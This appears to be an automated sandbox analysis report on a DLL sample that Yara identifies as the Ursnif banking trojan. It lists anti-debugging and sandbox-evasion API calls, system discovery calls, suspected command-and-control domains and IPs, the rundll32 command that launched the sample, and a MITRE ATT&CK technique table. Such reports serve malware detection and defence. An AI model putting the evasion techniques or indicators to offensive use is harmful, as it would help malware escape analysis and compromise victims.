Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: WerFault.exe, 00000013.00000003.524969424.0000000004A35000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW0
Source: WerFault.exe, 00000012.00000002.526051488.0000000005320000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.524764769.0000000004A1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.545662496.0000000004CD8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000017.00000002.545508557.0000000004C02000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW~
Source: WerFault.exe, 00000012.00000002.526349700.0000000005348000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6ED26CB3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECE1DE5 LoadLibraryA,GetProcAddress,

0_2_6ECE1DE5

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED3C325 mov eax, dword ptr fs:[00000030h]	0_2_6ED3C325
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED48861 mov eax, dword ptr fs:[00000030h]	0_2_6ED48861
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED8DFDA mov eax, dword ptr fs:[00000030h]	0_2_6ED8DFDA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED8DEAA mov eax, dword ptr fs:[00000030h]	0_2_6ED8DEAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED8DBB5 push dword ptr fs:[00000030h]	0_2_6ED8DBB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED3C325 mov eax, dword ptr fs:[00000030h]	3_2_6ED3C325
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED48861 mov eax, dword ptr fs:[00000030h]	3_2_6ED48861
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED8DFDA mov eax, dword ptr fs:[00000030h]	3_2_6ED8DFDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED8DEAA mov eax, dword ptr fs:[00000030h]	3_2_6ED8DEAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED8DBB5 push dword ptr fs:[00000030h]	3_2_6ED8DBB5

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6ED26CB3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED1B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6ED1B316
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED26CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6ED26CB3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED1B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6ED1B316

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 52.98.208.66 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.97.161.50 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.101.9.178 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 13.82.28.61 187	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.642262171.0000000000E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.473339722.00000000039D0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645184272.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.476198950.0000000003AA0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.485003177.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6ED19EB5
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6ED40E4C
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6ED4E448
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6ED40429
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6ED4EA21
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6ED4E3AD
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6ED4E344
Source: C:\Windows\System32\loaddll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6ED4E0A2
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6ED4E84C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6ED19EB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6ED40E4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6ED4E448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6ED40429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6ED4EA21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6ED4E3AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6ED4E344
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_6ED4E0A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6ED4E84C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0075A82B cpuid

0_2_0075A82B

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECE1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6ECE1172

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED3FF15 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_6ED3FF15

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECE1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6ECE1825

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0075A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_0075A82B

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection112	Virtualization/Sandbox Evasion1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection112	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
